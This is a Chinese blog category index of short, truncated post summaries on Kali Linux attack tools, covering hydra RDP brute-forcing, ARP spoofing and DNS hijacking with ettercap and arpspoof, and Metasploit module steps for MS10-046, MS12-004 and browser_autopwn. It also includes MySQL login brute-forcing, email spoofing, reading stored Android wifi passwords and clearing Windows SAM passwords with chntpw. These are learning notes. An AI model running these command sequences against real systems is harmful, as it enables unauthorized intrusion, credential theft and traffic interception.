随笔分类 -  Kali

摘要:hydra是一款全能的暴力破解工具,功能强大,几乎支持所有的协议,是著名黑客组织thc开发的。 在Kali Linux下已经是默认安装的,于是测试爆破一下自己的一台VM虚拟机服务器。hydra还支持GUI图形界面(xhydra),不过习惯还是命令好用。 (爆破3389端口终端登录的帐号和密码 协议: 阅读全文
posted @ 2018-01-10 23:43 journeyIT 阅读(37) 评论(0) 推荐(0) 编辑
摘要:ettercap是什么? 我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具,功能相信用过的朋友多多少少都知道,但这两款工具是在windows下运行的。 而ettercap是在linux下运行的 。其实功能都是差不多的,我称呼它为嗅探工具,ARP欺骗,DNS,劫持,中间人攻击等等 阅读全文
posted @ 2018-01-10 23:40 journeyIT 阅读(219) 评论(0) 推荐(0) 编辑
摘要:MS10-046远程执行漏洞(Windows快捷方式LNK文件自动执行代码漏洞攻击) 命令: 1. msfconsole //启动MSF Metasploit 2. search ms10-046 //搜索漏洞 3. use windows/browser/ms10_046_shortcut_ico 阅读全文
posted @ 2018-01-10 23:34 journeyIT 阅读(96) 评论(0) 推荐(0) 编辑
摘要:MS12-020远程桌面协议RDP拒绝访问漏洞 条件:受害者必须开放RDP协议 开放了3389端口 或者端口改了,知道对方RDP开放的对应端口。 过程:MSF利用 MSF显示为seems down说明目标已经被攻击。如图已经蓝屏。 阅读全文
posted @ 2018-01-10 23:31 journeyIT 阅读(62) 评论(0) 推荐(0) 编辑
摘要:MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。 我这里做测试的系统是Backbox linux ,这是一款网络渗透,信息安全评估系统。里边安装了许许多多的工具。其中MS 阅读全文
posted @ 2018-01-10 23:29 journeyIT 阅读(277) 评论(0) 推荐(0) 编辑
摘要:对于用户连接过的wifi,android系统把相关信息明文保存在 /data/misc/wifi/wpa_supplicant.conf中,root之后可以查看,或者利用手机的备份功能进行备份,这样不用root也可以查看。 阅读全文
posted @ 2018-01-10 23:22 journeyIT 阅读(321) 评论(0) 推荐(0) 编辑
摘要:1、无线网卡 2、KaliLinux操作系统,这里就不用说了,必备的 3、isc-dhcp-server服务器。安装好KaliLinux后只需要apt-get update 然后apt-get install isc-dhcp-server即可 4、Aircrack-ng套件 #用来发送数据 5、s 阅读全文
posted @ 2018-01-10 19:25 journeyIT 阅读(2393) 评论(0) 推荐(0) 编辑
摘要:官网:https://www.wireshark.org/download.html 阅读全文
posted @ 2018-01-10 19:13 journeyIT 阅读(194) 评论(0) 推荐(0) 编辑
摘要:server.py下载地址 https://github.com/breenmachine/dnsftp client.sh脚本 阅读全文
posted @ 2018-01-10 18:58 journeyIT 阅读(393) 评论(0) 推荐(0) 编辑
摘要:nslookup -qt=txt mail._domainkey.mail.vpgame.net 第一个mail 是上面所说的邮件域的selector,_domainkey 是固定格式(DKIM就是基于domainkeys的技术发展而来), mail.vpgame.net 是邮件域 Linux: d 阅读全文
posted @ 2018-01-10 18:53 journeyIT 阅读(401) 评论(0) 推荐(0) 编辑
摘要:–from <要显示的发件人邮箱> –ehlo <伪造的邮件ehlo头> –body <邮件正文> –header <邮件头信息,subject为邮件标题> 阅读全文
posted @ 2018-01-10 18:48 journeyIT 阅读(617) 评论(0) 推荐(0) 编辑
摘要:安装 apt-get install steghide steghide --help vim test.txt 输入 journeyIT 1. steghide embed -cf [图片文件载体] -ef [待隐藏文件] 2. [回车] 3. 输入密码,提取文件时用到,如果不想设密码,直接按回车 阅读全文
posted @ 2018-01-10 18:32 journeyIT 阅读(663) 评论(0) 推荐(1) 编辑
摘要:Haka是一种开源的以网络安全为导向的语言,可以用于编写安全规则和协议剥离器。在这一部分中,我们的重点是编写安全规则。 官网:http://www.haka-security.org/ github:https://github.com/haka-security/haka 阅读全文
posted @ 2018-01-10 18:06 journeyIT 阅读(299) 评论(0) 推荐(0) 编辑
摘要:1. 查看并启动启动apache服务 service apache2 status service apache2 start 2. 修改 /var/www/index.html 页面 vi /var/www/index.html 3. 修改 etter.dns 文件 格式为:劫持的域名 A 指向指 阅读全文
posted @ 2018-01-10 17:49 journeyIT 阅读(540) 评论(0) 推荐(0) 编辑
摘要:Arpspoof -i 网卡 -t 目标IP 网关 Kali : 网卡eth0 目标ip :192.168.1.100 网关:192.168.1.1 替换掉: arpspoof -i eth0 -t 192.168.100 192.168.1.1 怎么看局域网当中的ip呢 Fping -asg 19 阅读全文
posted @ 2018-01-10 17:48 journeyIT 阅读(779) 评论(0) 推荐(0) 编辑
摘要:1. use exploit/windows/browser/ms12_004_midi 2. show targets 3. info 4. set SRVHOST 【mine IP】 5. set SRVPORT 【80】 6. set URIPATH / 7. exploit -j 8. et 阅读全文
posted @ 2018-01-10 17:47 journeyIT 阅读(404) 评论(0) 推荐(0) 编辑
摘要:1. 打开 The Social-Engineer Toolkit 也就是所谓set 2. 依次选择 Social-Engineering Attacks Website Attacks Vectors Java Applet Attack Method Site Cloner 翻一下:社会工程学攻 阅读全文
posted @ 2018-01-10 17:47 journeyIT 阅读(818) 评论(0) 推荐(0) 编辑
摘要:search autopwn use server/browser_autopwn show options set LHOST set SRVPORT set URIPATH / show options 修改 etter.conf 文件 if you use ipchains if you us 阅读全文
posted @ 2018-01-10 17:46 journeyIT 阅读(105) 评论(0) 推荐(0) 编辑
摘要:search mysql use scanner/mysql/mysql_login show options set RHOSTS set USER_FILE /root/username.lst set PASS_FILE /root/passwords.lst exploit mysql -h 阅读全文
posted @ 2018-01-10 17:44 journeyIT 阅读(373) 评论(0) 推荐(0) 编辑
摘要:cd /mnt/windows/Windows/System32/config/ cd /mnt/windows/Windows/System32/config/ ls SAM chntpw -l SAM chntpw -u "username" SAM 1 - clear 阅读全文
posted @ 2018-01-10 17:43 journeyIT 阅读(365) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示